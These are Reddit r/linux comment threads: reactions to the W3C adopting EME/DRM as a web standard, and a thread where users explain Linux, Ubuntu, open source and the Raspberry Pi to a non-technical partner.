can someone explain the benefits of this would be plz, for a noob :)
Can someone explain to a total linux noob what this would mean? Not even sure what Libreboot is, so an explanation would be appreciated!
I was a K62 fan and then Athlon Duron and XP and then they lost me.

Ati lost me with their shitty drivers.

It'll take a lot to get me back.
[removed]
Not going to happen and the majority of users are running Windows, they don't care anyway.

Better would be to support non-x86 architectures like ARM, MIPS, POWER and SPARC.

Edit: I like how so many of you are easily so gullible that they trust a single AMD employee to change the whole company's strategy.
It looks like you're trying to mention another user, which only works if it's done in the comments like this (otherwise they don't receive a notification): 

- u/AMD_james



---

 ^I'm ^a ^bot. ^Bleep. ^Bloop. ^| ^Visit ^/r/mentionhelper ^for ^discussion/feedback ^| ^Want ^to ^be ^left ^alone? ^Reply ^to ^this ^message ^with ^"stop"
Stumbled upon this 6years later, has *any* progress been made?
EME aka Web DRM as supported W3C and others has the very real potential of Locking Linux out of the web, especially true in the Linux Desktop Space, and double true for the Fully Free Software version of Linux or Linux running on lesser used platforms like powerPC or ARM (rPi) 

The primary use case for Linux today is Web Based technology, either serving or Browsing. The W3C plays (or played) and integral role in that. Whether you are creating a site that will be served by Linux, or using a Linux desktop to consume web applications the HTML5 Standard is critical to using Linux on the Web.

Recently the W3C rejected the final and last appeal by EFF over this issue,  EME and Web DRM will now be a part of HTML5 Standard with none of the supported modifications or proposals submitted by the EFF to support Software Freedom, Security Research or User Freedom. 


##Responses
* Cory Doctorow: [World Wide Web Consortium abandons consensus, standardizes DRM with 58.4% support, EFF resigns](https://boingboing.net/2017/09/18/antifeatures-for-all.html)
* Bryan Lunduke: [W3C rejects appeal, approves DRM standard, votes kept secret](https://www.youtube.com/watch?v=h94ZKGVg-B8)
* EFF: [An open letter to the W3C Director, CEO, team and membership](https://www.eff.org/deeplinks/2017/09/open-letter-w3c-director-ceo-team-and-membership)

##Other Discussions here in /r/Linux 
* https://www.reddit.com/r/linux/comments/7118ye/eff_resigns_from_w3c/
* https://www.reddit.com/r/linux/comments/70xvxl/an_open_letter_to_the_w3c_director_ceo_team_and/
* https://www.reddit.com/r/linux/comments/70x2rl/w3c_rejects_appeal_approves_drm_standard_votes/





Thanks for posting this as an announcement.  This is absolutely critical -- the more eyes on all of it, the better.
So where's Red Hat? The Linux Foundation? all the big pro Linux corporate players? Seems like they're staying quiet.
[deleted]
what can be done?

I feel so powerless in issues like this, which is most of politics. Constituents largely don't understand and don't care. The constituents that do care, aren't listened to, because the corporate lobbies have the money and/or have already captured the regulatory bodies.

wtf do I do. sign another change.org petition?
The biggest problem I see is the failure of the w3c itself as a standards setting body.

Internet standards are to be set by consensus, under a multi-stakeholder governance.  
They have completely abandoned that by overruling members concerns without even addressing them. The fact that participation is closed is in itself a serious problem. Also, setting standards under secrecy.

They censored the EFF for trying to bring a tidbit of transparency to the process.

Work has to start at the IETF to substitute them for a suitable standard setting organization.

This wouldn't be a new thing: they had to do the same when ICANN started to draft the new TLDs specification on it's own and would give too much power to the big DNS registries and registrars (which had majority control over it). They took over the process and made a specification that took power away from them instead. If a vote was taken at ICANN by it's members at the time, the vote would indicate everything was just fine.

This standard didn't even address security concerns, which is a big no-no.

The w3c is modeled after the X Consortium (which was taken over by the Open Group, which should be called the not-Open Group). The X.org developers themselves are now developing Wayland and not X12 because of the failures of that standard setting model. It's a model specifically set up to favor big companies. The Wayland standard work is done in the IETF model (rough consensus and working code).
Absolutely wonderful. As if the Internet wasn't sufficiently capital-friendly? Now the Web is another step closer to becoming a new version of cable TV. 

Can we hurry up with [IPFS](https://github.com/ipfs/ipfs) or maybe a [Gopher revival](http://27.org/gopher-manifesto/)? I'm sick of this bullshit.
So at this point, realistically what can we as end users do?
It never ceases to amaze me how a very reduced group of people can dictate what the rest of us can or can't do despite what we actually want or need. 


How long until we build a new alternet with a real well-thougth Constitution?
This is how the internet dies: not with a bang, but with incremental slips into commercial greed and control-freak domination.
I’d recommend emailing Tim Berners-Lee, the overall director at W3C and expressing your dissatisfaction politely. You can find his email address [here](https://www.w3.org/People/). 
> Other Discussions here in /r/Linux

Also needs discussions on other subreddits.

Not sure where it'd get the most visibility.
Generally speaking where there is power the rich guys with a list schmooze and undermine their way into controlling it.  Others fall into line because they have a choice of being supported by the rich guys they might get a job with, or have a job with, and the others they already corrupted, or going it alone against them.

It's not just W3C, it's all such bodies... look at the Linux Foundation.  I don't know how to fix it but for sure secret ballots are a sign the corruption is complete.
Can someone recommend a video i can watch or article i can read that summarizes this whole situation up? I don't frequent Linux subreddit very often but this sounds important
I may be way too late to this thread, but can I get an ELI5 on this, and what it all means?

I got here from r/all, and while I do run Linux, I came largely for the customizability (I'm a UI design nerd), and I don't often keep up with this sort of stuff
And this is exactly why piracy will always exist. Long live the media pirates! Yarrrr
Wtf are these people thinking. DRM in the browser? Okay then. Really stupid decision. You really think this will protect your IP? What a joke. Shit needs to change people need to stop supporting these companies.
The W3C is the FCC of the internet.
as the evolution of HTML5 is now in the hands of corrupt f***tards, i think it's time to fork it... LHTML5?
So back to 1996 internet then... It's not that bad at all. When Reddit was Usenet, and there where locked gardens called CompuServe, AOL etc with pay per content services.
Is there some resource for those of us that don't really know what this means? Because some of the users here are acting like this is basically the end of the internet, but I thought DRM protected movies and games from piracy, so I think I'm missing like, every part of what this means
So crazy. I happened to see this as I was listening to Bryan Lunduke's video about why this is so horrible from July. I think we'll remember the summer of 2017 as the summer the internet officially started to suck.
The W3C and ICANN are no longer to be trusted.   
HTML needs to be forked.   
DNS needs to secured and ripped out of ICANNs hands.
Just when I thought that web would be a little more free with the discontinuation of Adobe Flash... This happens.

[My feelings](http://www.rslpokies.com/wp-content/uploads/sites/4/2016/12/Even-The-Rock-can-see-through-your-bullshit-slot-machine-tips.png).
[deleted]
i mean it is on a point that piracy is the better service without accounting for the fact that you are not paying.

In my country piracy (downloading, streaming but not uploading) is basically legal... what is a man to do...

ps: steam and gog are examples of good services that made me not pirate games (steam has drm, but it fucking works), i somehow doubt that these services will follow their example seeing the state of the web without an adblock
So what now? What can we do?
I don't understand why this is an issue, please ELI5.
Yarr harr fiddeldy-dee...
I wrotte an article about this subject months ago on my blog.

My concerns about EME -http://www.standardizedways.co.uk/index.php/2017/04/09/web-development-drm-concerns/
> The primary use case for Linux today is Web Based technology, either serving or Browsing.

I almost spilled my beer, but then you added _serving_ (not as such a Web Based technology) and all is well. Your point is excellent though. The rejection of freedom to web standards is incoherent with the fact that the web would be historically nonexistent without free and open source software.

However, like the internet, we too can route around issues that threaten interconnectivity. Failing to acknowledge what the internet is when creating a Web standard, seems to me like creating a paper standard, i.e. representing _what major shareholders would dream to monetize_ rather than the needs of the people. The W3C might be obsolete.
Just as a side-note, can we stop using terms like "consume web applications"? The last time I was online, the web remained out there after I left...

What comes next, accepting the term "intellectual property" - something inalienable that is set in stone and has one owner who can do whatever they wish with it (as opposed to an author)?

I thought that web applications are *used*, just as tools and many products of applied arts are. Same as culture is *viewed, watched, listened to, read, experienced*, and most importantly *shared*.
I am already annoyed by DRM on my games and my Blu Ray disks, now it's going to be a standard...
Wow that's some shady shit. 
Can I have an explanation why so many people think this is bad? The letter mostly talks about researches having to circumvent DRM (doubtful argument I think). 

There's obvious info-anarchists angle to this, but the real world doesn't seem to agree with "bytes should belong to the viewer and be freely copyable/storable" idea. 

Is everyone mad at W3C because they didn't have an epic anti-copyright and anti-dmca fight? Or because they decided not to dictate terms for parties that want to distribute those bytes and gave them a choice? 

I'd like to hear some level thoughts, since I didn't find much but emotions in previous discussions. 
I don't think this will harm Linux as bad as people seem to think. Isn't Linux the dominate operating system for web services? If companies push Linux out of the way then it will cost millions to convert all those web servers over to other operating systems like Windows. I don't think members of the W3C will harm Linux considering how big Linux actually is to the web.
W3C has become evil. We need to create a new web.
[deleted]
How can you run a "rental" or "streaming" service without DRM?

A service like Netflix or my state's ebook library couldn't exist without DRM. 

Explain to me how an ebook library would work without DRM. Would the library just send me an email after three weeks asking me to delete the file? 

I understand DRM can be defeated. I could make a handwritten copy of the text. I could take a picture or screenshot of each page. Maybe someone developed a tool that defeats the DRM. The point of DRM isn't to 100% secure the content, it's to prevent causal non technical users from easily making a copy of whatever they are renting/streaming. 

If my grandma could right click > save every video she watched on Netflix, the entire business model of streaming services would collapse. The reason it's $10/month is because I'm renting the content, not buying the content. 
If W3C are on board with DRM they can control the discussion rather than let Microsoft, Google, and Netflix be masters of a protocol alone that could shape the web's future.

Still sucks tho
What they should have done is included this as a standard plugin and not part of the core spec.  That way there is no guarantee that it will be there.

Expect to see DRMed ad now, with DMCA takedown notices to ad blockers.
Can't we just boycott Netflix, Hulu and all that other crap? It's all dramatic nonsense anyways. Am I missing something? Can someone ELI5 why I should care about this?
So, afaik Tim Berners-Lee is fully on board with this.

If so, could one say that any credibility he's held so far, as the "father of the web" and a proponent for a healty and free web, is utterly gone?
____

^^I ^^don't ^^know ^^if ^^he's ^^done/said ^^anything ^^earlier ^^to ^^lose ^^it, ^^but ^^every ^^time ^^I've ^^seen ^^him ^^in ^^media ^^he ^^was ^^speaking ^^*for* ^^net-neutrality, ^^open, ^^free ^^web, ^^and ^^such. ^^Not ^^any ^^more ^^I ^^guess...)
So this will stop youtube-dl and newpipe from working, yes?
Besides philosophical stances, is there anything that stops a Distribution creator to add closed source software to the system in order to play DRM on the web? Are there any actual distributions who already run EME DRM content? 
...waiting for wikileaks to reveal what's been going on here...
I'm out of the loop how will this effect me?
The only plausible recourse I see is overriding the practice at the EU' s European Court of justice. It doesn't HAVE to be the EU court, but let's not kid ourselves about the stances of the US  regulatory bodies and thus, the  federal courts. 


The biggest issue is the rejected legal protection against persecution for researchers and security experts. Without any legal experience I can only suspect that such activities could be classified as protected "fair use"-esque kind of action.

but this could only be done in the EU. the  same way, the ECJ - in tandem with the german authorities - have humiliated Facebook for its cookie practice, it could do it again. depriving the media companies the use of this weapon in the EU will or could make the persecution pointless globally. 

Hey, I understand that Linux is the house of Free-as-in-freedom social movements, but that doesn't mean Linux is strictly following the Free Software movement. Linux is a tool, and as such, is used as a key element to make open source based systems who don't necessarily need to bee 100% Free Software. I don't see why systems like Ubuntu or Rey Hat cant ship with the enough elements to support DRM if DRM is what the customer wants.

If the user wants 100% Free Software, they can pick for a certified GNU system who will not have support for DRM, and thus the browser won't be able to play Netflix. Meanwhile, allow me to watch it on my OpenSUSE, thank you. 
I'm a novice programmer who loves Chrome. Can I get a ELI5 on why I should be more outraged?
Can someone give me a basic explanation? What's going on? What parties are involved and why are they important?
Amatuer over here, just saw this on r/all. Did like half a minute of Googling and read that EME is good because it's not DRM in itself, it's only facilitating the already-present DRM fact-of-life, and allowing it to be done under an open, discussed standard. Why is what I read wrong?
How does this lock out linux? As said here linux is used to serve most of the content, what different would it be consuming it?

If you want to consume DRMed material is everyone's own choice ofc, but the ability to do so should be there right? Even more so now as a standart then before when every vendor had to support linux in its implementation.

Am I missing something? 

I would have preferred to turn down this drm btw, but seems like that is not an option anymore :(
This is disgusting, what can I do?
I love open source but why such a fuss about EME? The internet should be a place where people openly exchange information AND/OR do commerce. There's nothing wrong AT ALL about providing a standardized way to stream protected content. 
I know nothing. If I can use a computer or phone and it does basic tasks for me I’m all good. I currently use an iPhone and a MacBook. 

My boyfriend is much more into programming. Recently he got an expensive Lenovo and has dove headfirst into this Linux stuff. 

He tries to explain it to me. I don’t know what he’s saying! “Ubuntu,” “Free and Open,” “terminal.” He’s got this new software that’s not google called “Brave.” He got a Raspeberry Pie thing for Christmas. He’s so enamored with it, and wants to share it with me and make me use it, but he can’t explain it to me well enough for me to understand and when looking it up myself I can’t find many basic user friendly explanations either. Frankly, I’m a little scared of computers. Terrified of getting hacked. Anything wonky looking on my computer scares me and sometimes Linux looks, well, creepy to me. It’s definitely my lack of knowledge. I am a complete noob. 

If you guys had a friend, or gf, who knew nothing about Linux or ANYTHING, how would you even begin to explain it? I want to understand the slightest bit so I don’t crush his excitement with my lack of personal understanding (editing because the first way I worded it got the point across wrong)

Edit:

Thank you guys! I can’t believe how this blew up. I have been reading through all of the comments and a majority of them have been kind and very helpful. :) There’s a stigma around nerds especially computer nerds sometimes and I was a little nervous to come on here but you guys really wowed me that you guys really just care about this stuff and want to help. I wanted to address some things I’ve gotten comments on:

A lot of relationship advice. My boyfriend and I have talked about what the line is between sharing our stuff and being too melded together. He’s shown me many interests that I happen to have found I liked and vice versa. I’ve actually been pursuing some new interests recently such as cross stitch that can be my own thing apart from us. We very much enjoy each other and communicate often. Some of you are telling me not to feign interest and I’ll be honest, even if I don’t dive into this fully I just would like to know what he’s talking about to support him. 

Edited again because the passage I just wrote here didn’t make sense thank you guys again!!
>sometimes Linux looks, well, creepy to me.

I hope you don't venture into /r/unixporn
##### Introduction

I'll give my take on what linux is, and why your bf is excited about it.

Like most people, I grew up before smart phones were a thing. My gaming console had a small pixel italian man named Mario. My computer was a big box with a mouse and a keyboard.

Eventually things like smaller phones, ipod nanos, smaller windows computers were a thing.

Ads, hacking, sketchy programs were common, and I get where you're coming from. Sounds like you know how to use a phone and a computer, how everything works seems confusing, and mysterious.

For myself, eventually I got into programming like most of us here did, and like any discipline, you start slow, 1+1, and work your way up till you understand the more complex things like 2*2 or 4^4

To give you an "explain like I'm five" version, the most basic concept to understand is that: Everything is a computer.

Your PS5 is a computer. Your phone is a computer. Even your microwave and dishwasher are computers.

So what IS a computer, and what does it have to do with raspberry pie, and linux of all things?

---

##### What is a computer?

You can think of a computer as a light switch. When you turn it on, electricity runs through it and turns on your light bulb. When you turn it off, the electricity from the wall is cut off and it stops.

That's it! But... wait... how is my phone a light switch? Well think of traffic lights. In that example, maybe there are 3 light switches. 1 for green, 1 for yellow, 1 for red. There's more to it, like a clock that times how the colors change. The more switches you add to something, the more we can do!

A calculator might have 125 switches that are super small, and get turned on and off when you push the buttons.

Your iphone would have billions of these tiny, microscopic switches that all work together.

---

##### What is linux?

We have a basic idea of what a computer is, but what is this really weird cult "linux" that your bf keeps raving about?

Without going into details, in this day and age there are 3 main "Operating Systems" (you're familiar with 2 of them already most likely).

1. Mac
2. Windows
3. Linux

If you've used an iphone, ipad, macbook or any Apple things you're very familiar with the Mac operating system. Mac is actually a distant cousin to Linux, so if you're familiar you're not far off.

Windows is of course Microsoft, and windows computers. Almost everyone has used a windows computer at some point in their life.

Then there's this distant cousin Linux who only the nerds seem to use, but not so much.

Linux began in 1991 as a personal project by Finnish student Linus Torvalds with the goal to create a free and open operating system. Prior to Linux, operating systems like from Microsoft cost cold hard cash, and poor students like Linus couldn't afford them.

What happens when you get something built by a bunch of poor students and volunteers? You get something amazing!

Linux is not widely used by most common people. Your grandma won't have used it. Your boyfriends gaming buddies probably don't use it for gaming. Your favorite celebrities probably don't use it.

If you ever get a linux computer you'll notice it looks "different", and feels "off". It's built by nerds for nerds, and that is seen as great by some, and part of why it's only used mostly by programmers.

There are some who spend lots of time making it look and feel as good as a Mac computer or Windows computer, or playing games, creating art, or watching 4k movies. But it's not for everyone, it's like an automatic car vs a manual car with a stick shift. One is more streamlined, more accessible, and the other is a bit harder to use but offers more control, more customization.

If you get into linux, the "mysteries" of computers start to vanish, as at it's core it's much more simple. I could name you everything about my linux computer, how it works, what every folder does, and every program. It's just about the simplicity, the control, the speed, and the lack of mystery that draws us to it.

---

##### What are the things your bf are into?

Ubuntu is the most popular way to get linux on your computer. It's created by a company called Canonical, similarly that Windows is created by Microsoft. Think of Linux like a recipe, and Ubuntu like the final cookies that your Uncle baked. Everyone's cookie is going to be a bit different, they do things a bit differently, but it's all from the original recipe.

"Free and Open (source)" is a philosophical term that basically tries to get rid of the "mysteriousness" of computers by making all the "code" (the recipes) free for all to see and use! When you buy Microsoft cookies the recipe is a held secret for no one to see what's inside.

"Brave" is an internet browser. If you've ever used Safari or Google Chrome or Internet Explorer you've used an internet browser before. Again, similar recipe, but different final product.

"Raspeberry Pi" is like a tiny computer that runs Linux! That's all there is to it. It's a cute little computer that's inexpensive and runs a whole computer on it!

"Getting hacked" is one thing a lot of linux users don't worry about because since it's all free and open, and used by such a small subset of society, hackers don't usually waste their time trying to make ads on websites that would hack your linux machine. When I grew up, viruses, firewalls, and "cleaning" the family computer was a common occurrence, but switching to linux I have never once had a virus!

---

Hope this helps and isn't too patronizing. If you have any more questions please ask away, the best part of the linux community is how open and accepting everyone is no matter what you know or don't!
Op your a really sweet gf posing this. I at one point was in the extra same position as your bf and my gf at the time wasn't interested and I ended up explaining what I was doing a endless amount of times. Mostly because it went in one ear and out the other.
Since other people aren't really giving great descriptions, I will. First, I think it's awesome that you're trying to learn this stuff so you can understand what he's saying, that's really nice of you (kinda wish my girlfriend was this interested).

First of all, "free and open" refers to the philosophy behind the development and release of the software. It is completely free (don't have to pay to use it) and open source, which means all of the code for it is published and generally anyone can contribute features or bug fixes to it. This is a big driving factor behind why people use Linux. You can compare this to windows, which you have to pay like $100 to install the OS onto your computer, and it isn't open source (for the most part). You can also compare to mac, but not as easily since you can't as easily install Mac on a computer (aka a hackintosh), but you obviously know that the computers are very expensive, and a chunk of that price tag is for the OS. While both of these companies have _some_ open source stuff, the majority is closed and proprietary.

"Ubuntu" is a _distribution_ (distro) of a Linux based operating system. Which is kind of like a flavor. Ubuntu is a very beginner /user friendly distro of Linux.

"Raspberry Pi" is a very inexpensive, low power (or at least used to be low power, now they can be pretty powerful) computer. They are open source, and very cheap (some as little art $10). These are very good for learning Linux and also learning embedded systems with circuits.

I hope that's a good summation. I'm on mobile, so sorry for any bad formatting
Hi ! I'm writing this on my boyfriend's account. He loves Linux as well and explains a lot of things to me ! Here's my understanding from a "girlfriend's perspective". (I'm not tech savvy)

Linux is an Operating System (just like Mac OS and Windows), it's the software that makes the frontend (what you see and use, basically).

Linux is free and open-source. Open-source means everybody can read the code and change it. With these modifications, people create different distributions (= all the versions of linux like, for example, Ubuntu, Pop OS!, Arch Linux...) These versions come from the Linux Kernel but there are some modifications so every version is unique. 

The Linux Kernel is the most basic form of Linux. There's no graphical frontend, it just explains the computer how all the hardware parts communicate with each other.

The terminal is the place where you write commands.
For example, to quit an application, turn off the computer and to do all the other things you do on your computer, you can use commands. Sometimes it's quite useful.

All computers have a terminal but we don't have to use it. To open Safari or chrome, you can click on the icon 
 but you also can write the command on your terminal.

I hope I could help you ! Have a good day 😊
You know it's a Linux forum when someone who says they don't know much about computers comes in and the comments are all like "run `ls`", "see `/etc/`", "learn the terminal".
All we really want is someone to listen to us rant for a while. But if you want to know more about Linux just so you can be closer to him then, asking him would be the best thing you could do. If he's anything like most of the guys I know, he would be just thrilled that the person be loves spending time with cares enough to make the effort.

Also, he may go through a "phase" where he talks about arch way too much. Just give him a hug and tell him "that's nice". 

The most important thing to remember is that if he ever starts telling you about how much better emacs or nano are compared to vi... leave him, he's not worth your time 😜
For many of us, Linux is just another way to have fun. It seems like that's the case for your boyfriend too! All of these things are just new and exciting to him. Ubuntu, Brave... they're all different from what everybody is used to, Windows and Chrome. Raspberry Pi is fascinating because it allows you to use a computer for really cheap, and to hack away on it, using it for small, but cool projects that he can work on.  


Him sharing his hobby and his excitement with you means that you mean a lot to him.
One of the things that you learn when you're new to the Linux hobby is that it's difficult to share your enthusiasm for your new hobby with people who are not already also into Linux. There are a lot of suggestions here about how to get into Linux, but I think you're doing great being patient and interested -- that's all anyone can ask.
[In the beginning was the command line.](http://cristal.inria.fr/~weis/info/commandline.html) 
It's an older essay with some dated references, but the kernel of truth remains, and explains many love affairs with linux.
>If you guys had a friend, or gf, who knew nothing about Linux or ANYTHING, how would you even begin to explain it?

My advice will be very different to the others. I think you should learn more about your Mac, which will be easier for you and more useful because you use it. Macs are a bit easier than Linux for the non-techie users. He can then explain his Linux thrills to you in terms you will understand from your Mac. Some things are very similar e.g. "Terminal" while others less so e.g. "Brave". So, let him explain the advantage of Brave with regards to your usage of Safari or Chrome.

The upside of my approach is that you will become a better user which will help you, while at the same time improving your capacity to understand his passion. The downside is that he will tell you that everything on the Mac stinks ... but, you will eventually have interesting conversations and you will see how he behaves when you disagree or have different views ... and you will learn this on something that is not dear to your heart. He cannot break your heart by thrashing Macs, because you really don't care all that much.
As a female in IT I highly encourage you to jump in!  First off, there are so many different versions of linux. They are call distributions or distro. The most popular is Ubuntu. The good thing with linux, is because of its relatively low use as a personal operating system hacks are not common, but do happen and a good anti-virus and updating your system is a great idea.  That being said, much of the larger internet is ran on computers running linux like operating systems (this is like windows on most pcs). 

And the Pi might just be perfect for you to learn about computing. If you break anything, which is actually quite difficult, especially if your BF sets it up as such, you can just reinstall the operating system or OS and start again. PIs were meant for kids and those young at heart. 

So jump on in and get your hands dirty. Welcome to the fold, you will be fine!!!!
>I currently use an iPhone and a MacBook

&#x200B;

>Recently he got an expensive Lenovo

Love that :'D

&#x200B;

> I’m a little scared of computers. Terrified of getting hacked. 

First of all: You are not alone. Most people just see news on what broke or explode or whatever and come up with the most exaggerated stories about stuff that happened and/or broke. Also, many people pick up that Apple advertisement and lifestyle obsession. And things start to get cozy there.

Apple products are known for either broke to the most bogus reasons. Or live long enough to get down patched by Apple so people like you will buy new products. 

The upside is that it will work most of the time and will aid you around and make stuff as easy as possible. 

And then we have Linux. What you need to understand is, that Linux's roots are deep in server operation in large companies. Therefore that thing called terminal in which your boyfriend enters the most tedious and ponderous garbage is a pretty useful tool. The great thing is: it's learnable with just a little effort. 

But I don't want to get into that. What I want you to know is that Linux changed and came up with versions (called distributions) of itself, which is tailored down to absolute beginners. And some are even looking great on it. Thinking about stuff like [elementary OS](https://elementary.io/), [Deepin](https://www.deepin.org/en/) (which is a Chinese product if you mind), or, if you feel like a bit adventurous, [Manjaro](https://manjaro.org/). The best advice would be to not tinker in stuff like dual boot, but to get an older and used Lenovo Thinkpad (preferably from the T series) and ask your boyfriend to install it for you. This way you still got your MacBook as a reliable backup, but the possibility to get to know Linux and its packet store (with (almost) exclusively open and free of cost software) and grow into the understanding that Linux, nowadays, is just another operating system with big ease of usage option behind it. 

Hope I got you a bit of perspective on your noble cause.
> “Free and Open,”

What: Computer programs are made by writing down lists of instructions for how something happens and then running them through a program that creates the app that can be run. Commercial companies generally don't let you see the instructions. "Free and open" software involves giving people access and rights to modify those instructions.

Why is he excited: This allows you more control to understand and modify your computer and allows entire communities to emerge that find and fix bugs the original developer missed, take software in directions the original developer didn't want to or even revive old software whose team is no longer active.

> “terminal”

What: It's a text-based interface to computers (think what you see in hacking movies or old computers) rather than a mouse or touch based interface.

Why is he excited: If you were trying to make a movie, would you rather be able to use English (text) to communicate with the cast and crew or just to point and gesture to things (mouse/touch)? We'd all probably agree that English would be better even though we'd all probably want to gesture plenty of times too. Text/language is really good at expressing complicated thoughts in detail or even that you can refer back to and share. Gesturing/pointing can be very useful, but is very limited by how many gestures you have (right click, left click... single tap, two finger tap, pinch, ...) and what can physically fit on the screen to gesture to. ...Lastly, why then is EVERYBODY not using text-based interfaces? Take the same example above, but imagine instead of English I said Persian... it might not be worth learning an entirely new language to many people. With computers, text based interfaces take a lot more learning and memorization up front to allow their payoff to come, just like learning a spoken language of somebody you want to communicate with. (Also, sometimes, it's just better to point. If you're playing a shooting game or selecting photos... pointing to what you're talking about is much more intuitive than describing it with language.) I'm leaving some things out because this is a huge topic, but that's a good start. 

> “Ubuntu”

What: It's an "operating system distribution". Examples of "operating system" are Windows, Mac, Android or iOS. A "distribution" just means that it's the core (Linux) along with a set of other included default apps and settings. Ubuntu is a "distribution" of Linux that is geared toward ease of use and desktop/laptop use. There are many other distributions of Linux that look and act extremely different... like those that might run in your car or those that run on the computers that make Reddit work.

Why is he excited: Switching to Linux generally means a huge increase in being able to understand and control/customize your computer. It's also free. It's a time of a lot of potential and when there are so many new things to check out.

> He’s got this new software that’s not google called “Brave.”

Brave is a web browser like Google Chrome, Firefox, Safari, etc. Rather, *because Google Chrome is open source (re: above conversation)* the founder of Brave took Chrome and modified it be more privacy focused and have some other changes. That modified version is called Brave.

> He got a Raspeberry Pie thing for Christmas. He’s so enamored with it, and wants to share it with me and make me use it, but he can’t explain it to me well enough for me to understand and when looking it up myself I can’t find many basic user friendly explanations either. Frankly, I’m a little scared of computers. Terrified of getting hacked.
>
> Anything wonky looking on my computer scares me and sometimes Linux looks, well, creepy to me. It’s definitely my lack of knowledge. I am a complete noob.

This is actually one of the great reasons for getting the Raspberry Pi computer that he did. It's a cheap, tiny computer that's not your primary computer... so the stakes are really low as far as messing things up on it. If you somehow screwed it up, you still have your primary computers to use day to day while you figure out how to fix it.

But I think what you're finding is... using a computer with no purpose but using a computer doesn't make a lot of sense. It's like if somebody just handed you a calculator and said to start using it. ... why? If you "can use a computer or phone and it does basic tasks for me [you're] all good", that's fine and not super compatible with learning the intricacies of an entire system like Linux might involve. If he wants to "make you use it", but you're totally fine with what you have... what are you even going to do? In order to learn something like Linux... you need a purpose. For some that's deeply understanding what's happening in their computer, for others, it's getting the computer to do really well at fitting some need that they have. You mention you're scared of getting hacked and honestly that's the best motivation I see in your entire post... because sticking to "safe" software doesn't avoid that and using "open source" software does help that... but in the end, if you don't have some end goal... you're just going to be pushing buttons for no reason and bored that you don't care about what they do.

> If you guys had a friend, or gf, who knew nothing about Linux or ANYTHING, how would you even begin to explain it?

1. It would take years (because it took me years too).
2. I'd recognize that they just might not be interested.

Rather than explaining the "big" things like Linux and terminal, I'd probably stick to smaller self-contained parts of that journey... like some cool thing I did on Linux because it's open enough to let me.
well, first it has to be interesting to you and there are different types of introductions and it all depends on what you like to do. if you make music the raspberry pi hardware may be powerful enough for you to compose stuff and the linux software community will have all the software you need absolutely free for you to use

raspberry pi computers are very exciting because it packs a powerful punch for a small unit that barely uses any electricity. there's a guy on youtube who powers his from an ipad. some are used as security cameras. others are used as video game consoles. they're used to power arcade cabinets and robots and all sorts of gadgets. different attachments are made for the units so they can measure atmospheric pressure, temperature, humidity, etc. so for $100 you can make a full blown weather station that is extremely lightweight and easily powered. makes a great unit to attach to a weather balloon or tracking endangered species. About half of the millions of RaspberryPi computers sold are used for industrial applications.

they're fully programmable. imagine programming several to replicate a 

i recommend watching any one of these up until it's no longer interesting.

Computer programming:
https://www.youtube.com/watch?v=jjqgP9dpD1k 

Fun things to do with a Raspberry Pi:
https://www.raspberrypi.org/magpi-issues/MagPi70.pdf (taken from https://magpi.raspberrypi.org/issues/70) 

Linux is a very mature operating system and is very similar to Windows and MacOS. you should try it for yourself. it doesn't cost anything to try.
First off OP, I just want you to know: you’re an awesome partner for doing this. Lots of partners wouldn’t take the time to even try, and whether you succeed or not, you should feel really good for even giving it a solid attempt.
kinda sounds like a bait post
> I want to understand the slightest bit so I don’t crush his excitement with my lack of enthusiasm.

I don't think it's realistic for your shared excitement to be predicated on shared understanding. There will probably be times when he is lost in his head on a problem for a few days that involves a ton of detail.

In case it ever comes up. If you ever feel stupid  if you're unable to understand, I insist the issue 
Is that he's unable to explain.

One way you can share is if you have some common problem/goal to automate. Some system you both agree on that will make your lives easier or be fun.  Home automation, photo sharing, etc.
Here is a basic overview of linux from a noob’s (me) perspective. Linux is a free and open source operating system (a operating system is a environment that computers run on, like Windows or MacOS). There are different “distros” (distributions) of linux (like Ubuntu, Debian and Mint, just different flavors of Linux). And a Raspberry Pi is just a very customizable micro-computer.
It could be different from other people, but I'd like to share a bit about *why* people like Linux and choose to use it. 

I like to think of Linux as the "lego brick" of operating systems. All of the little pieces that go together to make an operating system work are highly customizable and sometimes even removable. Linux itself is just one of these bricks, the other bricks being the bits that play audio, or the bits that show pictures on the screen, or the bits that grab info from the internet, stuff like that.

Sure, you could go to the store and buy the nice shiny firetruck (Windows) that does one thing, or you could make a firetruck out of Legos (Linux) that works just as good, maybe even better, but it's still a bit rough around the edges. Because you've built the firetruck yourself, you have a good sense of how it works and how it can be used to solve problems.

But what happens when you're sick of your firetruck and you want an airplane? If you have the Windows firetruck you're shit outta luck. The Linux firetruck can be disassembled and re-assembled in a different shape than before. This is why nerds like Linux. You can customize it to the nth degree. There are also places online where you can view Lego blueprints for free.  

You have a computer that doesn't have a display screen? You can remove the screen-controller lego brick. You have a computer that doesn't have a CD drive? You can remove that brick too. Some specialized Linux configurations can get really really small and streamlined and can still be run on old, less-powerful computers with no trouble. This is what the Raspberry Pi is doing. It's not a very powerful computer, but it runs a special version of Linux that doesn't have a lot of the "fluff" that you would find in Windows. 

"Ubuntu" is just a different configuration of these bricks that tries to be very user-friendly and visually pleasing. It's not trying to exactly copy Windows or Mac OS, but rather give people a meaningful alternative to them. 

From a career standpoint, if your boyfriend has a working knowledge of Linux then he will be viewed favorably by potential employers for a lot of different tech fields. Linux is the go-to operating system for most serious programmers or network technicians. Putting "I use Linux for personal use on home computers." on a resume could be the thing that separates him in a pool of candidates.
>If you guys had a friend, or gf, who knew nothing about Linux or ANYTHING, how would you even begin to explain it?

Please, this community can only get so erect. It's like christmas, easter and all our birthdays combined.
Just wanted to say that your boyfriend is a good and very lucky person, to have his SO care about his OS. Wishing you best luck in learning and discovering here!
Let your boyfriend let you explain the things. He will probably enjoy telling you about all the things. And if he can get you into Linux and OSS that will be one of the greatest achievements for him too!!!
I don't think i can be much helpful here since i myself am a noob here, but imma save this post till i get a wholesome free award and give it to this post. The way you're trying to learn stuff for your boyfriend, It totally made my day. He's indeed very lucky. Hope you succeed ＼(^o^)／
your boyfriend is smart.
You are a great person for wanting to share in your boyfriend's enthusiasm.  
  Good on you!  
  
Here is a link to a playlist that you and your boyfriend may find very useful:  [Linux Command Line by TheFrugalComputerGuy](https://youtube.com/playlist?list=PLy7Kah3WzqrHPrgkBgwzXyfDDCvthdUfl)  
  
I suggest this play list on the command prompt and his [series on using VIM](https://www.youtube.com/playlist?list=PLy7Kah3WzqrEjsuvhT46fr28Q11oa5ZoI) - the superior visual editor (incoming hate mail! lol) because even with 20+ years of using various distributions of Linux, I manage to learn new things all the time and this series (particularly the VIM one) was particularly noteworthy.
